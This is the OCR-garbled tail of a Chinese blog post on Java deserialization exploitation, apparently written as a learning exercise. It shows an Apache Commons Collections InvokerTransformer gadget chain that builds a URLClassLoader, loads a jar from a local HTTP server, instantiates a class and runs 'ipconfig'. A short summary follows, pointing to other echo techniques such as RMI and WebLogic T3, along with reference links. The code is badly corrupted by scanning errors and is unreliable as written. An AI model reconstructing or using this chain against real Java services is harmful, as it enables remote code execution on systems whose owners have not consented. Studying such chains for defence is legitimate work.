new InvokerTransformer(*getConstructor*»new Class[]{Class[J.class}.
new Object[](new Class[](URL[J.class))),new InvokerTransformer(*newInstance*.
new Class[]{Object[].class),new Object [] (now Object[] (nw CRLU {new l'RL("hltp:〃127.0.0. 1:8090/sunner. jar*)}))),
new InvokerTvansformer(*loadClass\new Class[]{String.class},
new Object!] {^suniier*}),new InvokerTransformer ("gzConmucik,
nw Classi] {Class[],class},new Object[](nev Class[](Siring.class)}).
new InvokerTransformer(*newlnstance*.
ne*
1
Class[] {Object[].class).
new Object[](nev String[]{^ipconfig*}))总结
笔者这里总结都是以cc链为改造基础,其实CC还有很多玩法,大家可以脑洞一下,Java反
序列化回显也不止本文中两种,比例说RMI、weblogic的T3协议。学习无止境,努
力就完事。
于无常处知有情,于有情处知众生
参考https://javasec.
org/javase/ClassLoader/
. aliyun. com/1/7740
Java小白修炼手册
-全文完-
